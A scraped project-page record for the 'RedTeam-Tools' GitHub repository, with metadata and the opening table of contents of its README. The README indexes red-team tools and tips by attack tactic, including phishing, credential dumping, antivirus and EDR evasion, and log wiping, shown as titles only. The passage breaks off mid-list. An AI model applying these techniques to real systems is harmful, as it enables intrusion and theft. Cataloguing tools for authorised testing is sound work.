[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-72965":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":10,"languages":10,"totalLinesOfCode":10,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":16,"stars7d":17,"stars30d":18,"stars90d":15,"forks30d":15,"starsTrendScore":19,"compositeScore":20,"rankGlobal":10,"rankLanguage":10,"license":10,"archived":21,"fork":21,"defaultBranch":22,"hasWiki":23,"hasPages":21,"topics":24,"createdAt":10,"pushedAt":10,"updatedAt":42,"readmeContent":43,"aiSummary":44,"trendingCount":15,"starSnapshotCount":15,"syncStatus":45,"lastSyncTime":46,"discoverSource":47},72965,"RedTeam-Tools","A-poc\u002FRedTeam-Tools","A-poc","Tools and Techniques for Red Team \u002F Penetration Testing","",null,8825,1184,138,1,0,20,44,93,60,111.52,false,"main",true,[25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41],"cheatsheet","cybersecurity","enumeration","hacking","linux","mitre-attack","payload","penetration-testing","pentest","pentest-tools","red-team","red-team-tools","redteam","resources","security-tools","tools","windows","2026-06-12 04:01:07","# RedTeam-Tools\n\n\u003Cp align=\"center\">\n\u003Cimg src=\"https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210680426-20a92131-56f9-43ad-be82-f449e3215dda.png\" height=\"300\">\n\u003C\u002Fp>\n\nThis github repository contains a collection of **150+** **tools** and **resources** that can be useful for **red teaming activities**. \n\nSome of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.\n\n> 🔗 If you are a Blue Teamer, check out [BlueTeam-Tools](https:\u002F\u002Fgithub.com\u002FA-poc\u002FBlueTeam-Tools)\n\n> **Warning** \n> \n> *The materials in this repository are for informational and educational purposes only. 
They are not intended for use in any illegal activities.*\n\n> **Note** \n> \n> *Hide Tool List headings with the arrow.*\n> \n> *Click 🔙 to get back to the list.*\n\n# Tool List\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Red Team Tips\u003C\u002Fb> 19 tips\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n        \t\u003Cli>\u003Cb>\u003Ca href=\"#improved-html-smuggling-with-mouse-move-eventlistener\">Improved HTML smuggling with mouse move eventlistener\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @pr0xylife\u003C\u002Fi>\u003C\u002Fli>\n        \t\u003Cli>\u003Cb>\u003Ca href=\"#google-translate-for-phishing\">Google translate for phishing\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @malmoeb\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#hiding-the-local-admin-account\">Hiding the local admin account\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#cripple-windows-defender-by-deleting-signatures\">Cripple windows defender by deleting signatures\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#enable-multiple-rdp-sessions-per-user\">Enable multiple RDP sessions per user\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#sysinternals-psexecexe-local-alternative\">Sysinternals PsExec.exe local alternative\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @GuhnooPlusLinux\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#live-off-the-land-port-scanner\">Live off the land port scanner\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#proxy-aware-powershell-downloadstring\">Proxy aware PowerShell DownloadString\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca 
href=\"#looking-for-internal-endpoints-in-browser-bookmarks\">Looking for internal endpoints in browser bookmarks\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#query-dns-records-for-enumeration\">Query DNS records for enumeration\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#unquoted-service-paths-without-powerup\">Unquoted service paths without PowerUp\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#bypass-a-disabled-command-prompt-with-k\">Bypass a disabled command prompt with \u002Fk\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Martin Sohn Christensen\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#stop-windows-defender-deleting-mimikatzexe\">Stop windows defender deleting mimikatz.exe\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @GuhnooPlusLinux\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#check-if-you-are-in-a-virtual-machine\">Check if you are in a virtual machine\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @dmcxblue\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#enumerate-applocker-rules\">Enumerate AppLocker rules\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#cmd-shortcut-with-6-pixels-via-mspaint\">CMD shortcut with 6 pixels via mspaint\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PenTestPartners\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#link-spoofing-with-preventdefault-javascript-method\">Link spoofing with PreventDefault JavaScript method\u003C\u002Fa>\u003C\u002Fb>\u003Ci> \u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#check-smb-firewall-rules-with-responder\">Check SMB firewall rules with Responder\u003C\u002Fa>\u003C\u002Fb>\u003Ci> 
@malmoeb\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#disable-av-with-sysinternals-pssuspend\">Disable AV with SysInternals PsSuspend\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @0gtweet\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>        \n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Reconnaissance\u003C\u002Fb> 24 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#spiderfoot\">spiderfoot\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Automated OSINT and attack surface mapping\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#reconftw\">reconftw\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Automated subdomain and vulnerability recon tool\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#subzy\">subzy\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Subdomain takeover vulnerability checker\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#smtp-user-enum\">smtp-user-enum\u003C\u002Fa>\u003C\u002Fb>\u003Ci> SMTP user enumeration\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#crtsh---httprobe---eyewitness\">crt.sh -> httprobe -> EyeWitness\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Automated domain screenshotting\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#jsendpoints\">jsendpoints\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Extract page DOM links\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#nuclei\">nuclei\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Vulnerability scanner\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#certsniff\">certSniff\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Certificate transparency log keyword sniffer\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#gobuster\">gobuster\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Website path brute force\u003C\u002Fi>\u003C\u002Fli>\n   
         \u003Cli>\u003Cb>\u003Ca href=\"#feroxbuster\">feroxbuster\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Fast content discovery tool written in Rust\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#cloudbrute\">CloudBrute\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Cloud infrastructure brute force\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#dnsrecon\">dnsrecon\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Enumerate DNS records\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#shodanio\">Shodan.io\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Public facing system knowledge base\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#aort\">AORT (All in One Recon Tool)\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Subdomain enumeration\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#spoofcheck\">spoofcheck\u003C\u002Fa>\u003C\u002Fb>\u003Ci> SPF\u002FDMARC record checker\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#awsbucketdump\">AWSBucketDump\u003C\u002Fa>\u003C\u002Fb>\u003Ci> S3 bucket enumeration\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#githarvester\">GitHarvester\u003C\u002Fa>\u003C\u002Fb>\u003Ci> GitHub credential searcher\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#trufflehog\">truffleHog\u003C\u002Fa>\u003C\u002Fb>\u003Ci> GitHub credential scanner\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#dismap\">Dismap\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Asset discovery\u002Fidentification\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#enum4linux\">enum4linux\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows\u002Fsamba enumeration\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#skanuvaty\">skanuvaty\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Dangerously fast dns\u002Fnetwork\u002Fport 
scanner\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#metabigor\">Metabigor\u003C\u002Fa>\u003C\u002Fb>\u003Ci> OSINT tool that needs no API keys\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#gitrob\">Gitrob\u003C\u002Fa>\u003C\u002Fb>\u003Ci> GitHub sensitive information scanner\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#gowitness\">gowitness\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Web screenshot utility using Chrome Headless\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Resource Development\u003C\u002Fb> 12 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#remoteinjector\">remoteinjector\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Inject a remote template link into a Word document\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#chimera\">Chimera\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell obfuscation\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#msfvenom\">msfvenom\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Payload creation\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#shellter\">Shellter\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Dynamic shellcode injection tool\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#freeze\">Freeze\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Payload creation (circumventing EDR)\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#wordsteal\">WordSteal\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Steal NTLM hashes with Microsoft Word\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#ntapi-undocumented-functions\">NTAPI Undocumented Functions\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows NT Kernel, Native API and drivers\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#kernel-callback-functions\">Kernel Callback Functions\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Undocumented Windows APIs\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#offensivevba\">OffensiveVBA\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Office macro code execution and evasion techniques\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#wsh\">WSH\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows Script Host payload\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#hta\">HTA\u003C\u002Fa>\u003C\u002Fb>\u003Ci> HTML Application payload\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#vba\">VBA\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Office macro (VBA) payload\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Initial Access\u003C\u002Fb> 10 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#credmaster\">CredMaster\u003C\u002Fa>\u003C\u002Fb>\u003Ci> CredKing-based password sprayer that rotates source IPs through FireProx\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#trevorspray\">TREVORspray\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Password sprayer with threading\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#evilqr\">evilqr\u003C\u002Fa>\u003C\u002Fb>\u003Ci> QRLJacking phishing PoC\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#cupp\">CUPP\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Common User Passwords Profiler (CUPP)\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#bash-bunny\">Bash Bunny\u003C\u002Fa>\u003C\u002Fb>\u003Ci> USB attack tool\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#evilgophish\">EvilGoPhish\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Phishing campaign framework (evilginx2 + GoPhish)\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#social-engineer-toolkit-set\">The 
Social-Engineer Toolkit\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Phishing campaign framework\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#hydra\">Hydra\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Network login brute force tool\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#squarephish\">SquarePhish\u003C\u002Fa>\u003C\u002Fb>\u003Ci> OAuth\u002FQR code phishing framework\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#king-phisher\">King Phisher\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Phishing campaign framework\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Execution\u003C\u002Fb> 13 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#responder\">Responder\u003C\u002Fa>\u003C\u002Fb>\u003Ci> LLMNR, NBT-NS and mDNS poisoner\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#secretsdump\">secretsdump\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Remote hash dumper\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#evil-winrm\">evil-winrm\u003C\u002Fa>\u003C\u002Fb>\u003Ci> WinRM shell\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#donut\">Donut\u003C\u002Fa>\u003C\u002Fb>\u003Ci> In-memory .NET execution\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#macro_pack\">Macro_pack\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Macro obfuscation\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#powersploit\">PowerSploit\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell post-exploitation module suite\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#rubeus\">Rubeus\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Kerberos interaction and abuse toolkit (C#)\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#sharpup\">SharpUp\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows privilege escalation checks (C# port of PowerUp)\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#sqlrecon\">SQLRecon\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Offensive MS-SQL toolkit\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#ultimateapplockerbypasslist\">UltimateAppLockerByPassList\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Common AppLocker bypass techniques\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#starfighters\">StarFighters\u003C\u002Fa>\u003C\u002Fb>\u003Ci> JavaScript and VBScript based Empire launcher\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#demiguise\">demiguise\u003C\u002Fa>\u003C\u002Fb>\u003Ci> HTA encryption tool\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#powerzure\">PowerZure\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell framework to assess Azure security\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Persistence\u003C\u002Fb> 4 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#impacket\">Impacket\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Python library and example scripts for Windows network protocols\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#empire\">Empire\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Post-exploitation framework\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#sharpersist\">SharPersist\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows persistence toolkit\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#ligolo-ng\">ligolo-ng\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Tunneling tool that uses a TUN interface\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Privilege Escalation\u003C\u002Fb> 11 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#crassus\">Crassus\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows privilege escalation discovery tool\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#linpeas\">LinPEAS\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Linux privilege escalation\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#winpeas\">WinPEAS\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows privilege escalation\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#linux-smart-enumeration\">linux-smart-enumeration\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Linux privilege escalation\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#certify\">Certify\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active Directory Certificate Services privilege escalation\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#get-gpppassword\">Get-GPPPassword\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Group Policy Preferences password extraction\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#sherlock\">Sherlock\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell script to find missing privilege escalation patches\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#watson\">Watson\u003C\u002Fa>\u003C\u002Fb>\u003Ci> .NET tool to enumerate missing KBs for privilege escalation\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#impulsivedllhijack\">ImpulsiveDLLHijack\u003C\u002Fa>\u003C\u002Fb>\u003Ci> DLL hijack tool\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#adfsdump\">ADFSDump\u003C\u002Fa>\u003C\u002Fb>\u003Ci> AD FS dump tool\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#beroot\">BeRoot\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Multi OS privilege escalation project\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Defense Evasion\u003C\u002Fb> 8 tools\u003C\u002Fsummary>\n 
   \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#invoke-obfuscation\">Invoke-Obfuscation\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Script obfuscator\u003C\u002Fi>\u003C\u002Fli>\n\t        \u003Cli>\u003Cb>\u003Ca href=\"#veil\">Veil\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Metasploit payload obfuscator\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#sharpblock\">SharpBlock\u003C\u002Fa>\u003C\u002Fb>\u003Ci> EDR bypass via entry point execution prevention\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#alcatraz\">Alcatraz\u003C\u002Fa>\u003C\u002Fb>\u003Ci> GUI x64 binary obfuscator\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#mangle\">Mangle\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Compiled executable manipulation\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#amsi-fail\">AMSI Fail\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell snippets that break or disable AMSI\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#scarecrow\">ScareCrow\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Payload creation framework designed around EDR bypass\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#moonwalk\">moonwalk\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Linux system log and filesystem timestamp remover\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Credential Access\u003C\u002Fb> 11 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#mimikatz\">Mimikatz\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows credential extractor\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#lazagne\">LaZagne\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Local password extractor\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca 
href=\"#hashcat\">hashcat\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Password hash cracking\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#john-the-ripper\">John the Ripper\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Password hash cracking\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#scomdecrypt\">SCOMDecrypt\u003C\u002Fa>\u003C\u002Fb>\u003Ci> SCOM credential decryption tool\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#nanodump\">nanodump\u003C\u002Fa>\u003C\u002Fb>\u003Ci> LSASS process minidump creation\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#eviltree\">eviltree\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Tree remake for credential discovery\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#seeyoucm-thief\">SeeYouCM-Thief\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Cisco phone system configuration file parsing\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#mailsniper\">MailSniper\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Microsoft Exchange mail searcher\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#sharpchromium\">SharpChromium\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Chromium cookie, history and saved login extractor\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#dploot\">dploot\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Remote DPAPI looting in Python\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Discovery\u003C\u002Fb> 6 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#pcredz\">PCredz\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Credential extraction from PCAP files or a live interface\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#pingcastle\">PingCastle\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active Directory security assessor\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#seatbelt\">Seatbelt\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Host situational awareness and security checks (C#)\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#adrecon\">ADRecon\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active Directory recon\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#adidnsdump\">adidnsdump\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active Directory Integrated DNS dumping\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#scavenger\">scavenger\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Post-exploitation scanner for sensitive files on compromised systems\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    